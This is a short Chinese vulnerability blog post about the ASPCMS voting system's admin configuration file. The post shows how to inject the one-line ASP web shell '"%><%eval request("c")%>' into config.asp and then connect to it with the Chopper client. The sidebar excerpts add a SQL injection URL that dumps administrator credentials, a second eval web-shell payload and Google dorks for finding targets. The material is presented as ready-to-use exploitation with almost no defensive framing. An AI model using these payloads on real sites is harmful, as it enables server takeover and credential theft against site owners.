aspcms投票系统后台插马漏洞

最新推荐文章于 2024-08-04 11:12:03 发布
最新推荐文章于 2024-08-04 11:12:03 发布
阅读量2.3k 收藏 1
点赞数
分类专栏: 漏洞收集 文章标签: aspcms

发布日期:2012-12-12
发布作者:月末

漏洞类型:设计错误
漏洞描述:后台配置文件采用文件写入,未严格过滤导致插入一句话木马。
 

config.asp内容

 
 
  1. <%Const SiteName="ASPCMS 开源投票系统 V1.0"             Const ks="0"                         Const xxps="1"                         Const kssm="投票已关闭,更多信息请登录http://www.aspcms.com"                         Const gz="3"                         Const glsj=""                          Const Copyright="Copyright 2006-2011 上谷网络 版权所有(底部信息,可在后台网站基本设置修改)" %> 

在末尾加上
"%><%eval request("c")%>

 

 

菜刀连接:

 

 
7禧
关注
专栏目录
修正的ASPCMS投票系统, V2.0版本(已修正IP限制、后台自动登录 去漏洞
03-12
修正的ASPCMS投票系统, V2.0版本(已修正IP限制、后台自动登录 去漏洞
aspcms绕过进入后台
04-11
aspcms绕过进入后台
ASPCMS漏洞之文件上传漏洞
最新发布
weixin_57240513的博客
08-04 332
ASPCMS是由上⾕⽹络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且⽀持模版⾃定义、⽀持扩展插件等等,能够在短时间内完成 企业建站。
常见cms漏洞ASPCMS
ineedmoreMuQ的博客
08-03 386
漏洞复现,使用后台配置文件拿shell。
【WEB】aspcms漏洞利用
热门推荐
HAPPY
08-18 1万+
【社工方法】(不推荐) 1.首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011 的漏洞,果然功夫不负有心人 2.接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password...
ASPCMS 漏洞详细教程
2201_75891821的博客
08-03 353
将slideTextStatus的值修改为1%25><%25Eval(Request(chr(65)))25><%25 放包(连接密码是a)然后用工具连接 成功连接。
Art2008 CMS 网站管理系统 v3.1.rar
07-05
3、上传文件管理,根据时间进行文件夹分类管理,很方便的进行文件清理,大大节约空间资源:系统后台可以根据管理员操作的项目来清理无效、过期的文件,从而大大节约了空间,节约了成本。 4、支持在线支付和充值卡...
ASP网站CMS程序源码——帝国CMS网站管理系统(Empire CMS) 繁体中文版实例开发.rar
10-17
**ASP网站CMS程序源码——帝国CMS网站管理系统(Empire CMS) 繁体中文版实例开发** 在当今互联网行业中,内容管理系统(CMS)扮演着至关重要的角色,它为企业和个人提供了一个便捷的方式来创建、管理和发布内容。...
凹丫丫ASP免费新闻发布系统 v4.9.zip
07-05
投票系统 广告系统 编辑后台配置(设置水印、上传文件大小、上传文件格式) 单页模块(关于我们、联系方式等等) 评论审核 文章分类 (关键词设置、栏目介绍 发布文章也可以自定义关键词) 增加图片栏目(首页...
ASP.NET源码——[CMS程序]NetFocus最新版源代码.zip
10-09
这个名为"NetFocus最新版源代码.zip"的压缩包包含的是基于ASP.NET技术的CMS(内容管理系统)程序的源代码。CMS系统使得非技术人员也能方便地管理和更新网站内容,而无需深入编程知识。 NetFocus CMS可能包含了以下...
0day漏洞aspcms漏洞实战
weixin_49071539的博客
12-16 3528
1. 谷歌搜索关键字 Powered by aspcms.com Copyright ?2010-2011 intitle:Powered by AspCms2 2. 接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 3.
批量注入ASPCMS获得管理后台权限
08-25
批量注入ASPCMS获得管理后台权限,很好的东西
aspcms后台地址
05-17
aspcms后台地址,秒杀老版本,修改后台地址一样能跳到真实地址
最新ASPCMS 0DAY利用工具(附VB源码)
03-25
详细使用方法在软件窗体内已经写好,直接编译执行即可使用.截止12-3-25日仍有效. 这是一个0day的EXP最好实例.
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 652
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
漏洞复现】I Doc View在线文档预览任意文件读取 1day
失心少年
12-14 613
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!I Doc View在线文档预览是一款在线文档预览系统,可以实现文档的预览及文档协作编辑功能。其存在代码执行漏洞,使得攻击者可以通过利用这个接口,触发服务器下载并解析恶意文件,从而导致远程命令执行漏洞
漏洞复现】AspCMS commentList.asp SQL注入
失心少年
09-14 1460
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码,进行解密后登录获取敏感数据。1.利用如下POC可获取管理员MD5的密码。
复现 ASPCMS企业建站系统Cookies欺骗漏洞
记录并分享学习安全的知识点..
08-21 915
ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 ASPCMS2.0存在sql注入注入漏洞,可获得admin管理员用户的cookie值。
使用ASP.NET 3.5构建CMS系统实战
"ASP.NET CMS内容发布系统的开发" 在IT领域,内容管理系统(CMS)是构建和维护网站的重要工具,尤其对于需要频繁更新内容的在线平台。本书《ASP.NET3.5 Content Management System Development》专注于使用ASP.NET ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值